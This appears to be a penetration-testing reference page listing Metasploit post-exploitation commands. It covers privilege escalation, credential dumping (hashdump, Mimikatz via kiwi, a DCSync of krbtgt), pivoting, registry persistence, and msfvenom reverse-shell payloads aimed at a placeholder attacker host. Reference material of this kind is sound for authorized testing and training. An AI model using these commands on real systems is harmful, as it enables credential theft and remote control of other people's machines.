Metasploit Post-Exploitation

Overview

Metasploit Framework provides extensive post-exploitation capabilities through Meterpreter sessions. This page covers Meterpreter commands, post modules for privilege escalation and enumeration, and pivoting through Metasploit. For initial exploitation, see the relevant technique pages.

ATT&CK Mapping

• Tactics: TA0002 - Execution, TA0004 - Privilege Escalation
• Techniques: T1059 - Command and Scripting Interpreter

Techniques

Essential Meterpreter Commands

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# File operations
meterpreter > upload /local/file.exe C:\\Windows\\Temp\\file.exe
meterpreter > download C:\\Windows\\Temp\\secret.txt /local/path/
meterpreter > ls
meterpreter > cd C:\\Users

# Process management
meterpreter > ps
meterpreter > migrate <pid>
meterpreter > kill <pid>

# Networking
meterpreter > ipconfig
meterpreter > netstat
meterpreter > arp
meterpreter > route

# Shell access
meterpreter > shell
meterpreter > execute -f cmd.exe -i -H

Privilege Escalation

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Try auto-escalation
meterpreter > getsystem

# Suggest local exploits
use post/multi/recon/local_exploit_suggester
set SESSION <id>
run

# Token impersonation
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "<DOMAIN>\\<user>"

# UAC bypass modules
use exploit/windows/local/bypassuac_fodhelper
set SESSION <id>
run

Credential Harvesting

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Dump password hashes (requires SYSTEM)
meterpreter > hashdump

# Mimikatz via Meterpreter (kiwi)
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > creds_msv
meterpreter > creds_kerberos
meterpreter > kiwi_cmd "lsadump::dcsync /domain:<domain> /user:krbtgt"

# Search for credentials
use post/windows/gather/credentials/credential_collector
set SESSION <id>
run

# Dump browser passwords
use post/multi/gather/firefox_creds
use post/windows/gather/enum_chrome

Pivoting

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Add route through Meterpreter session
route add <internal_subnet>/<mask> <session_id>

# Auto-route
use post/multi/manage/autoroute
set SESSION <id>
run

# Start SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j

# Port forwarding
meterpreter > portfwd add -l 8080 -p 80 -r <internal_target>
meterpreter > portfwd list

# Reverse port forward
meterpreter > portfwd add -R -l 4444 -p 4444 -L <attacker_ip>

Post Modules — Enumeration

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Windows enumeration
use post/windows/gather/enum_logged_on_users
use post/windows/gather/enum_shares
use post/windows/gather/enum_applications
use post/windows/gather/enum_patches
use post/windows/gather/checkvm

# Linux enumeration
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_users_history

# Network enumeration
use post/multi/gather/ping_sweep

Post Modules — Persistence

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Windows persistence (registry-based startup payload)
use exploit/windows/local/persistence
set SESSION <id>
set LHOST <attacker_ip>
run

Session Management

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# List sessions
sessions -l

# Interact with session
sessions -i <id>

# Background current session
meterpreter > background

# Upgrade shell to Meterpreter
sessions -u <shell_session_id>

# Run module on all sessions
sessions -K              # Kill all sessions

Payload Generation

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf

# Web payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f aspx -o shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.jsp
msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.php

# MSI (for AlwaysInstallElevated)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f msi -o shell.msi

References

Official Documentation

• Metasploit Framework

MITRE ATT&CK

• T1059 - Command and Scripting Interpreter